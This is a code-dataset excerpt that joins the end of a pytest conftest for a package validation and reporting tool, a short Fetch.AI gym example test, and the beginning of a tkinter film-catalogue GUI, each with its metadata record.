\"\"\"\n timezone = time.tzname[time.localtime().tm_isdst]\n return \"{} {}\".format(str(datetime.datetime.now()), timezone)\n\n\n# noinspection PyUnusedLocal\ndef pytest_sessionstart(session):\n ALL_RESULTS.clear()\n COLLECTION_FAILURES.clear()\n\n\n# noinspection PyUnusedLocal\ndef pytest_sessionfinish(session, exitstatus):\n \"\"\"\n If not a self-test run, generate the output reports\n \"\"\"\n if not session.config.option.package_dir:\n return\n\n if session.config.option.package_source:\n template_source = session.config.option.package_source\n else:\n template_source = os.path.abspath(session.config.option.package_dir)\n\n generate_report(\n get_output_dir(session.config),\n template_source,\n session.config.option.report_format,\n )\n\n\ndef make_href(paths, base_dir=None):\n \"\"\"\n Create an anchor tag to link to the file paths provided.\n :param paths: string or list of file paths\n :param base_dir: If specified this is pre-pended to each path\n :return: String of hrefs - one for each path, each seperated by a line\n break (
{name}\".format(\n abs_path=abs_path, name=name\n )\n )\n return \"
\".join(links)\n\n\ndef generate_report(outpath, template_path, output_format=\"csv\"):\n \"\"\"\n Generates the various output reports.\n\n :param outpath: destination directory for all reports\n :param template_path: directory containing the CNF package validated\n :param output_format: One of \"html\", \"excel\", or \"csv\". Default is \"html\"\n :raises: ValueError if requested output format is unknown\n \"\"\"\n failures = [r for r in ALL_RESULTS if r.is_failed]\n generate_failure_file(outpath)\n output_format = output_format.lower().strip() if output_format else \"html\"\n generate_json(outpath, template_path)\n if output_format == \"html\":\n generate_html_report(outpath, template_path, failures)\n elif output_format == \"excel\":\n generate_excel_report(outpath, template_path, failures)\n elif output_format == \"json\":\n return\n elif output_format == \"csv\":\n generate_csv_report(outpath, template_path, failures)\n else:\n raise ValueError(\"Unsupported output format: \" + output_format)\n\n\ndef write_json(data, path):\n \"\"\"\n Pretty print data as JSON to the output path requested\n\n :param data: Data structure to be converted to JSON\n :param path: Where to write output\n \"\"\"\n with open(path, \"w\") as f:\n json.dump(data, f, indent=2)\n\n\ndef generate_failure_file(outpath):\n \"\"\"\n Writes a summary of test failures to a file named failures.\n This is for backwards compatibility only. The report.json offers a\n more comprehensive output.\n \"\"\"\n failure_path = os.path.join(outpath, \"failures\")\n failures = [r for r in ALL_RESULTS if r.is_failed]\n data = {}\n for i, fail in enumerate(failures):\n data[str(i)] = {\n \"file\": fail.files[0] if len(fail.files) == 1 else fail.files,\n \"vnfrqts\": fail.requirement_ids,\n \"test\": fail.test_case,\n \"test_file\": fail.test_module,\n \"raw_output\": fail.raw_output,\n \"message\": fail.error_message,\n }\n write_json(data, failure_path)\n\n\ndef generate_csv_report(output_dir, template_path, failures):\n rows = [[\"Validation Failures\"]]\n headers = [\n (\"Tool Version:\", version.VERSION),\n (\"Report Generated At:\", make_timestamp()),\n (\"Directory Validated:\", template_path),\n (\"Checksum:\", hash_directory(template_path)),\n (\"Total Errors:\", len(failures) + len(COLLECTION_FAILURES)),\n ]\n rows.append([])\n for header in headers:\n rows.append(header)\n rows.append([])\n\n if COLLECTION_FAILURES:\n rows.append([COLLECTION_FAILURE_WARNING])\n rows.append([\"Validation File\", \"Test\", \"Fixtures\", \"Error\"])\n for failure in COLLECTION_FAILURES:\n rows.append(\n [\n failure[\"module\"],\n failure[\"test\"],\n \";\".join(failure[\"fixtures\"]),\n failure[\"error\"],\n ]\n )\n rows.append([])\n\n # table header\n rows.append([col for col, _ in REPORT_COLUMNS])\n\n reqs = load_current_requirements()\n\n # table content\n for i, failure in enumerate(failures, start=1):\n rows.append(\n [\n i,\n \"\\n\".join(failure.files),\n failure.requirement_text(reqs),\n failure.error_message,\n failure.test_id,\n ]\n )\n\n output_path = os.path.join(output_dir, \"report.csv\")\n with open(output_path, \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n for row in rows:\n writer.writerow(row)\n\n\ndef generate_excel_report(output_dir, template_path, failures):\n output_path = os.path.join(output_dir, \"report.xlsx\")\n workbook = xlsxwriter.Workbook(output_path)\n bold = workbook.add_format({\"bold\": True, \"align\": \"top\"})\n code = workbook.add_format(\n {\"font_name\": \"Courier\", \"text_wrap\": True, \"align\": \"top\"}\n )\n normal = workbook.add_format({\"text_wrap\": True, \"align\": \"top\"})\n heading = workbook.add_format({\"bold\": True, \"font_size\": 18})\n worksheet = workbook.add_worksheet(\"failures\")\n worksheet.write(0, 0, \"Validation Failures\", heading)\n\n headers = [\n (\"Tool Version:\", version.VERSION),\n (\"Report Generated At:\", make_timestamp()),\n (\"Directory Validated:\", template_path),\n (\"Checksum:\", hash_directory(template_path)),\n (\"Total Errors:\", len(failures) + len(COLLECTION_FAILURES)),\n ]\n for row, (header, value) in enumerate(headers, start=2):\n worksheet.write(row, 0, header, bold)\n worksheet.write(row, 1, value)\n\n worksheet.set_column(0, len(headers) - 1, 40)\n worksheet.set_column(len(headers), len(headers), 80)\n\n if COLLECTION_FAILURES:\n collection_failures_start = 2 + len(headers) + 2\n worksheet.write(collection_failures_start, 0, COLLECTION_FAILURE_WARNING, bold)\n collection_failure_headers = [\"Validation File\", \"Test\", \"Fixtures\", \"Error\"]\n for col_num, col_name in enumerate(collection_failure_headers):\n worksheet.write(collection_failures_start + 1, col_num, col_name, bold)\n for row, data in enumerate(COLLECTION_FAILURES, collection_failures_start + 2):\n worksheet.write(row, 0, data[\"module\"])\n worksheet.write(row, 1, data[\"test\"])\n worksheet.write(row, 2, \",\".join(data[\"fixtures\"]))\n worksheet.write(row, 3, data[\"error\"], code)\n\n # table header\n start_error_table_row = 2 + len(headers) + len(COLLECTION_FAILURES) + 4\n worksheet.write(start_error_table_row, 0, \"Validation Failures\", bold)\n for col_num, (col_name, _) in enumerate(REPORT_COLUMNS):\n worksheet.write(start_error_table_row + 1, col_num, col_name, bold)\n\n reqs = load_current_requirements()\n\n # table content\n for col, width in enumerate((20, 30, 60, 60, 40)):\n worksheet.set_column(col, col, width)\n err_num = 1\n for row, failure in enumerate(failures, start=start_error_table_row + 2):\n worksheet.write(row, 0, str(err_num), normal)\n worksheet.write(row, 1, \"\\n\".join(failure.files), normal)\n worksheet.write(row, 2, failure.requirement_text(reqs), normal)\n worksheet.write(row, 3, failure.error_message.replace(\"\\n\", \"\\n\\n\"), normal)\n worksheet.write(row, 4, failure.test_id, normal)\n err_num += 1\n worksheet.autofilter(\n start_error_table_row + 1,\n 0,\n start_error_table_row + 1 + err_num,\n len(REPORT_COLUMNS) - 1,\n )\n workbook.close()\n\n\ndef make_iso_timestamp():\n \"\"\"\n Creates a timestamp in ISO 8601 format in UTC format. Used for JSON output.\n \"\"\"\n now = datetime.datetime.utcnow()\n now.replace(tzinfo=datetime.timezone.utc)\n return now.isoformat()\n\n\ndef aggregate_results(outcomes, r_id=None):\n \"\"\"\n Determines the aggregate result for the conditions provided. Assumes the\n results have been filtered and collected for analysis.\n\n :param outcomes: set of outcomes from the TestResults\n :param r_id: Optional requirement ID if known\n :return: 'ERROR', 'PASS', 'FAIL', or 'SKIP'\n (see aggregate_requirement_adherence for more detail)\n \"\"\"\n if not outcomes:\n return \"PASS\"\n elif \"ERROR\" in outcomes:\n return \"ERROR\"\n elif \"FAIL\" in outcomes:\n return \"FAIL\"\n elif \"PASS\" in outcomes:\n return \"PASS\"\n elif {\"SKIP\"} == outcomes:\n return \"SKIP\"\n else:\n pytest.warns(\n \"Unexpected error aggregating outcomes ({}) for requirement {}\".format(\n outcomes, r_id\n )\n )\n return \"ERROR\"\n\n\ndef aggregate_run_results(collection_failures, test_results):\n \"\"\"\n Determines overall status of run based on all failures and results.\n\n * 'ERROR' - At least one collection failure occurred during the run.\n * 'FAIL' - Template failed at least one test\n * 'PASS' - All tests executed properly and no failures were detected\n\n :param collection_failures: failures occuring during test setup\n :param test_results: list of all test executuion results\n :return: one of 'ERROR', 'FAIL', or 'PASS'\n \"\"\"\n if collection_failures:\n return \"ERROR\"\n elif any(r.is_failed for r in test_results):\n return \"FAIL\"\n else:\n return \"PASS\"\n\n\ndef relative_paths(base_dir, paths):\n return [os.path.relpath(p, base_dir) for p in paths if p != \"\"]\n\n\n# noinspection PyTypeChecker\ndef generate_json(outpath, template_path):\n \"\"\"\n Creates a JSON summary of the entire test run.\n \"\"\"\n reqs = load_current_requirements()\n data = {\n \"version\": \"dublin\",\n \"template_directory\": os.path.splitdrive(template_path)[1].replace(\n os.path.sep, \"/\"\n ),\n \"timestamp\": make_iso_timestamp(),\n \"checksum\": hash_directory(template_path),\n \"outcome\": aggregate_run_results(COLLECTION_FAILURES, ALL_RESULTS),\n \"tests\": [],\n \"requirements\": [],\n }\n\n results = data[\"tests\"]\n for result in COLLECTION_FAILURES:\n results.append(\n {\n \"files\": [],\n \"test_module\": result[\"module\"],\n \"test_case\": result[\"test\"],\n \"result\": \"ERROR\",\n \"error\": result[\"error\"],\n \"requirements\": result[\"requirements\"],\n }\n )\n for result in ALL_RESULTS:\n results.append(\n {\n \"files\": relative_paths(template_path, result.files),\n \"test_module\": result.test_module,\n \"test_case\": result.test_case,\n \"result\": result.outcome,\n \"error\": result.error_message if result.is_failed else \"\",\n \"requirements\": result.requirements_metadata(reqs),\n }\n )\n\n # Build a mapping of requirement ID to the results\n r_id_results = defaultdict(lambda: {\"errors\": set(), \"outcomes\": set()})\n for test_result in results:\n test_reqs = test_result[\"requirements\"]\n r_ids = (\n [r[\"id\"] if isinstance(r, dict) else r for r in test_reqs]\n if test_reqs\n else (\"\",)\n )\n for r_id in r_ids:\n item = r_id_results[r_id]\n item[\"outcomes\"].add(test_result[\"result\"])\n if test_result[\"error\"]:\n item[\"errors\"].add(test_result[\"error\"])\n\n requirements = data[\"requirements\"]\n for r_id, r_data in reqs.items():\n requirements.append(\n {\n \"id\": r_id,\n \"text\": r_data[\"description\"],\n \"keyword\": r_data[\"keyword\"],\n \"result\": aggregate_results(r_id_results[r_id][\"outcomes\"]),\n \"errors\": list(r_id_results[r_id][\"errors\"]),\n }\n )\n\n if r_id_results[\"\"][\"errors\"] or r_id_results[\"\"][\"outcomes\"]:\n requirements.append(\n {\n \"id\": \"Unmapped\",\n \"text\": \"Tests not mapped to requirements (see tests)\",\n \"result\": aggregate_results(r_id_results[\"\"][\"outcomes\"]),\n \"errors\": list(r_id_results[\"\"][\"errors\"]),\n }\n )\n\n report_path = os.path.join(outpath, \"report.json\")\n write_json(data, report_path)\n\n\ndef generate_html_report(outpath, template_path, failures):\n reqs = load_current_requirements()\n fail_data = []\n for failure in failures:\n fail_data.append(\n {\n \"file_links\": make_href(failure.files, template_path),\n \"test_id\": failure.test_id,\n \"error_message\": escape(failure.error_message).replace(\n \"\\n\", \"

\"\n ),\n \"raw_output\": escape(failure.raw_output),\n \"requirements\": docutils.core.publish_parts(\n writer_name=\"html\", source=failure.requirement_text(reqs)\n )[\"body\"],\n }\n )\n pkg_dir = os.path.split(__file__)[0]\n j2_template_path = os.path.join(pkg_dir, \"report.html.jinja2\")\n with open(j2_template_path, \"r\") as f:\n report_template = jinja2.Template(f.read())\n contents = report_template.render(\n version=version.VERSION,\n num_failures=len(failures) + len(COLLECTION_FAILURES),\n template_dir=make_href(template_path),\n checksum=hash_directory(template_path),\n timestamp=make_timestamp(),\n failures=fail_data,\n collection_failures=COLLECTION_FAILURES,\n )\n with open(os.path.join(outpath, \"report.html\"), \"w\") as f:\n f.write(contents)\n\n\ndef hash_directory(path):\n \"\"\"\n Create md5 hash using the contents of all files under ``path``\n :param path: string directory containing files\n :return: string MD5 hash code (hex)\n \"\"\"\n md5 = hashlib.md5() # nosec\n for dir_path, sub_dirs, filenames in os.walk(path):\n for filename in filenames:\n file_path = os.path.join(dir_path, filename)\n with open(file_path, \"rb\") as f:\n md5.update(f.read())\n return md5.hexdigest()\n\n\ndef load_current_requirements():\n \"\"\"Loads dict of current requirements or empty dict if file doesn't exist\"\"\"\n with io.open(CNF_REQUIREMENTS_FILE, encoding=\"utf8\", mode=\"r\") as f:\n data = json.load(f)\n version = data[\"current_version\"]\n return data[\"versions\"][version][\"needs\"]\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--package-directory\",\n dest=\"package_dir\",\n action=\"store\",\n help=\"Path to .zip file or directory which holds the package for validation\",\n )\n\n parser.addoption(\n \"--optional-tests-setting\",\n dest=\"optional_tests_setting\",\n action=\"store\",\n default=os.path.join(os.path.dirname(__file__), \"optional_tests_setting.yaml\"),\n help=\"Alternate file containing settings for additional tests\",\n )\n\n parser.addoption(\"--package-source\", dest=\"package_source\", action=\"store\")\n\n parser.addoption(\n \"--output-directory\",\n dest=\"output_dir\",\n action=\"store\",\n default=None,\n help=\"Alternate directory for report output.\",\n )\n\n parser.addoption(\n \"--report-format\",\n dest=\"report_format\",\n action=\"store\",\n help=\"Format of output report (html, csv, excel, json)\",\n )\n\n\ndef pytest_configure(config):\n global package_dir\n global optional_tests_settings\n if not (config.getoption(\"package_dir\") or config.getoption(\"help\")):\n raise Exception('\"--package-directory\" must be specified')\n\n input_path = config.getoption(\"package_dir\")\n assert os.path.exists(input_path), \"{} does not exist\".format(input_path)\n if os.path.isfile(input_path):\n assert zipfile.is_zipfile(\n input_path\n ), \"Input should be a zip file or a directory with package contents\"\n archive = zipfile.ZipFile(input_path)\n target_dir = tempfile.TemporaryDirectory().name\n archive.extractall(path=target_dir)\n package_dir = target_dir\n elif os.path.isdir(input_path):\n package_dir = input_path\n\n optional_tests_settings_file = config.getoption(\"optional_tests_setting\")\n assert os.path.isfile(optional_tests_settings_file)\n optional_tests_settings = yaml.safe_load(open(optional_tests_settings_file))\n\n helm_packages_list.extend(\n [\n p\n for p in os.scandir(package_dir)\n if p.name.startswith(\"helm\") and p.name.endswith(\".tgz\")\n ]\n )\n\n\ndef pytest_generate_tests(metafunc):\n global package_dir\n\n if \"package_dir\" in metafunc.fixturenames:\n metafunc.parametrize(\"package_dir\", [package_dir])\n\n if \"helm_package\" in metafunc.fixturenames:\n metafunc.parametrize(\"helm_package\", helm_packages_list)\n\n\n@pytest.fixture\ndef artifact_files(package_dir):\n files_list = os.scandir(package_dir)\n artifacts_list = [p for p in files_list if not p.name == \"MANIFEST.json\"]\n return artifacts_list\n\n\n@pytest.fixture\ndef manifest_schema_file():\n schema_file_path = os.path.join(os.path.dirname(__file__), \"manifest_schema.json\")\n if not os.path.exists(schema_file_path):\n raise RuntimeError(\n \"manifest_schema.json missing from 'tests' directory in validation tool\"\n )\n return open(schema_file_path)\n\n\n@pytest.fixture\ndef json_file(package_dir):\n json_path = os.path.join(package_dir, \"MANIFEST.json\")\n return open(json_path)\n\n\n@pytest.fixture\ndef json_data(json_file):\n json_data = json.load(json_file)\n return json_data\n", "sub_path": "ice_validator/tests_cnf/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 26968, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.basicConfig", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 57, "usage_type": "call"}, {"api_name": "boltons.funcutils.wraps", "line_number": 96, "usage_type": "call"}, {"api_name": "boltons.funcutils", "line_number": 96, "usage_type": "name"}, {"api_name": "re.match", "line_number": 116, "usage_type": "call"}, {"api_name": "re.MULTILINE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 264, "usage_type": "call"}, {"api_name": "os.path", "line_number": 264, "usage_type": "attribute"}, {"api_name": "pytest.hookimpl", "line_number": 277, "usage_type": "call"}, {"api_name": "time.tzname", "line_number": 296, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 297, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 297, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path", "line_number": 317, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 334, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path", "line_number": 340, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 340, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 382, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path", "line_number": 391, "usage_type": "attribute"}, {"api_name": "version.VERSION", "line_number": 409, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 453, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path", "line_number": 459, "usage_type": "attribute"}, {"api_name": "xlsxwriter.Workbook", "line_number": 460, "usage_type": "call"}, {"api_name": "version.VERSION", "line_number": 471, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 528, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 528, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 529, "usage_type": "attribute"}, {"api_name": "pytest.warns", "line_number": 554, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.splitdrive", "line_number": 594, "usage_type": "call"}, {"api_name": "os.path", "line_number": 594, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 595, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 629, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 665, "usage_type": "call"}, {"api_name": "os.path", "line_number": 665, "usage_type": "attribute"}, {"api_name": "cgi.escape", "line_number": 677, "usage_type": "call"}, {"api_name": "cgi.escape", "line_number": 680, "usage_type": "call"}, {"api_name": "docutils.core.core.publish_parts", "line_number": 681, "usage_type": "call"}, {"api_name": "docutils.core.core", "line_number": 681, "usage_type": "attribute"}, {"api_name": "docutils.core", "line_number": 681, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 686, "usage_type": "call"}, {"api_name": "os.path", "line_number": 686, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 687, "usage_type": "call"}, {"api_name": "os.path", "line_number": 687, "usage_type": "attribute"}, {"api_name": "jinja2.Template", "line_number": 689, "usage_type": "call"}, {"api_name": "version.VERSION", "line_number": 691, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 699, "usage_type": "call"}, {"api_name": "os.path", "line_number": 699, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 709, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 710, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 712, "usage_type": "call"}, {"api_name": "os.path", "line_number": 712, "usage_type": "attribute"}, {"api_name": "io.open", "line_number": 720, "usage_type": "call"}, {"api_name": "json.load", "line_number": 721, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 738, "usage_type": "call"}, {"api_name": "os.path", "line_number": 738, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 738, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 767, "usage_type": "call"}, {"api_name": "os.path", "line_number": 767, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 768, "usage_type": "call"}, {"api_name": "os.path", "line_number": 768, "usage_type": "attribute"}, {"api_name": "zipfile.is_zipfile", "line_number": 769, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 772, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 773, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 776, "usage_type": "call"}, {"api_name": "os.path", "line_number": 776, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 780, "usage_type": "call"}, {"api_name": "os.path", "line_number": 780, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 781, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 786, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 804, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 802, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 811, "usage_type": "call"}, {"api_name": "os.path", "line_number": 811, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 811, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 812, "usage_type": "call"}, {"api_name": "os.path", "line_number": 812, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 809, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 821, "usage_type": "call"}, {"api_name": "os.path", "line_number": 821, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 819, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 827, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 825, "usage_type": "attribute"}]} +{"seq_id": "58902791", "text": "# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"The tests module contains the tests of the gym example.\"\"\"\n\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom tests.common.pexpect_popen import PexpectWrapper\nfrom tests.common.utils import run_in_root_dir\n\n\n@run_in_root_dir\ndef test_gym_ex():\n \"\"\"Run the gym ex sequence.\"\"\"\n try:\n process = PexpectWrapper( # nosec\n [\n sys.executable,\n str(Path(\"examples/gym_ex/train.py\").resolve()),\n \"--nb-steps\",\n \"50\",\n ],\n env=os.environ.copy(),\n maxread=1,\n encoding=\"utf-8\",\n logfile=sys.stdout,\n )\n\n process.expect([\"Step 50/50\"], timeout=10)\n process.wait_to_complete(5)\n assert process.returncode == 0, \"Test failed\"\n finally:\n process.terminate()\n process.wait()\n", "sub_path": "tests/test_examples/test_gym_ex.py", "file_name": "test_gym_ex.py", "file_ext": "py", "file_size_in_byte": 1645, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tests.common.pexpect_popen.PexpectWrapper", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ.copy", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tests.common.utils.run_in_root_dir", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "18881796", "text": "from tkinter import *\nfrom PIL import ImageTk, Image\nfrom db_init import write_file, genresTable, films, commentTable\nfrom tkinterCreate import create_genre_page, create_film_page\nimport json\nfrom datetime import date as date_module, datetime\n\ndef film_window(window, film_table, offset):\n\n def back():\n display.destroy()\n\n def open_genre_page():\n genre_window(window, genresTable)\n\n def open_next():\n film_window(window, film_table, offset+2)\n\n def open_prev():\n b = max(0, offset-2)\n film_window(window,film_table, b)\n\n def create_genre():\n create_genre_page(window)\n\n def create_film():\n create_film_page(window)\n\n display = Frame(window, height = 700, width=1300, bg=\"GREEN\")\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n genres = Button(display, text=\"genres\", font=(\"Gotham\", \"15\"), command=open_genre_page)\n genres.place(x=100, y=10)\n\n createGenre = Button(display, text=\"Create Genre\", font=(\"Gotham\", \"15\"), command=create_genre)\n createGenre.place(x=200, y=10)\n\n createFilm = Button(display, text=\"Create Film\", font=(\"Gotham\", \"15\"), command=create_film)\n createFilm.place(x=400, y=10)\n\n # сделать prevPage\n\n prevPage = Button(display, text=\"prev\", font=(\"Gotham\", \"15\"), command=open_prev)\n prevPage.place(x=450, y=600)\n\n nextPage = Button(display, text=\"next\", font=(\"Gotham\", \"15\"), command=open_next)\n nextPage.place(x=1000, y=600)\n\n def show_film(x, y, id, name, descr, rating, genre_id, photo, genre_title):\n\n def open_film_onclick(event):\n exact_film(window, id)\n\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=x+230, y=y+10)\n namelbl.bind('', open_film_onclick)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=x + 230, y=y+60)\n\n ratinglbl = Label(display, text=rating, font=(\"Gotham\", \"12\"))\n ratinglbl.place(x=x + 700, y=y+10)\n\n genrelbl = Label(display, text=genre_title, font=(\"Gotham\", \"12\"))\n genrelbl.place(x=x + 230, y=y+200)\n\n write_file(photo, name + \".jpg\")\n image1 = Image.open(name + \".jpg\")\n image1 = image1.resize((180, 240), Image.ANTIALIAS)\n test = ImageTk.PhotoImage(image1)\n label1 = Label(display, image=test, width=180, height=240)\n label1.image = test\n label1.place(x=x+10, y=y)\n\n films = film_table.get_films(offset)\n for film in films:\n id = film[0]\n name = film[1]\n descr = film[2]\n rating = film[3]\n genre_id = film[4]\n photo = film[5]\n genre_title = film[6]\n show_film(baseX, baseY, id, name, descr, rating, genre_id, photo, genre_title)\n baseY+=300\n\n\ndef genre_window(window, genre_table):\n def back():\n display.destroy()\n\n display = Frame(window, height = 700, width=1300)\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n\n def show_genre(x, y, id, name, descr):\n\n def get_films_by_genre():\n filmslist = films.get_films_by_genre(id, 0)\n filmlist_window(window, filmslist, id, 0)\n idlbl = Label(display, text=str(id), font=(\"Gotham\", \"12\"))\n idlbl.place(x=x + 90, y=y + 10)\n\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=x+110, y=y+10)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=x + 100, y=y+30)\n\n line = Canvas(display, width=1000, height=2, bg=\"BLUE\")\n line.place(x=x, y=y + 50)\n\n films_genre = Button(display, text=\"films\", command=get_films_by_genre)\n films_genre.place(x=x+700, y=y+10)\n\n genres = genre_table.get_genres()\n print(genres)\n for genre in genres:\n id = genre[0]\n name = genre[1]\n descr = genre[2]\n\n show_genre(baseX, baseY, id, name, descr)\n baseY+=60\n\ndef filmlist_window(window, filmlist, genre_id, offset):\n def back():\n display.destroy()\n\n def open_genre_page():\n genre_window(window, genresTable)\n\n def open_prev():\n global films\n b = max(0, offset-2)\n filmsList = films.get_films_by_genre(genre_id, b)\n filmlist_window(window, filmsList, genre_id, b)\n\n def open_next():\n global films\n filmsList = films.get_films_by_genre(genre_id, offset+2 )\n filmlist_window(window, filmsList, genre_id, offset+2)\n\n display = Frame(window, height = 700, width=1300)\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n genres = Button(display, text=\"genres\", font=(\"Gotham\", \"15\"), command=open_genre_page)\n genres.place(x=100, y=10)\n\n # сделать prevPage\n prevPage = Button(display, text=\"prev\", font=(\"Gotham\", \"15\"), command=open_prev)\n prevPage.place(x=450, y=600)\n\n nextPage = Button(display, text=\"next\", font=(\"Gotham\", \"15\"), command=open_next)\n nextPage.place(x=1000, y=600)\n\n def show_film(x, y, id, name, descr, rating, genre_id, photo, genre_title):\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=x+230, y=y+10)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=x + 230, y=y+60)\n\n ratinglbl = Label(display, text=rating, font=(\"Gotham\", \"12\"))\n ratinglbl.place(x=x + 700, y=y+10)\n\n genrelbl = Label(display, text=genre_title, font=(\"Gotham\", \"12\"))\n genrelbl.place(x=x + 230, y=y+200)\n\n write_file(photo, name + \".jpg\")\n image1 = Image.open(name + \".jpg\")\n image1 = image1.resize((180, 240), Image.ANTIALIAS)\n test = ImageTk.PhotoImage(image1)\n label1 = Label(display, image=test, width=180, height=240)\n label1.image = test\n label1.place(x=x+10, y=y)\n\n films = filmlist\n for film in films:\n id = film[0]\n name = film[1]\n descr = film[2]\n rating = film[3]\n genre_id = film[4]\n photo = film[5]\n genre_title = film[6]\n show_film(baseX, baseY, id, name, descr, rating, genre_id, photo, genre_title)\n baseY+=300\n\ndef exact_film(window, id):\n\n def back():\n display.destroy()\n\n def open_genre_page():\n genre_window(window, genresTable)\n\n def show_comment(x,y,comment_id, user_id, film_id, content, date, username):\n usernamelbl = 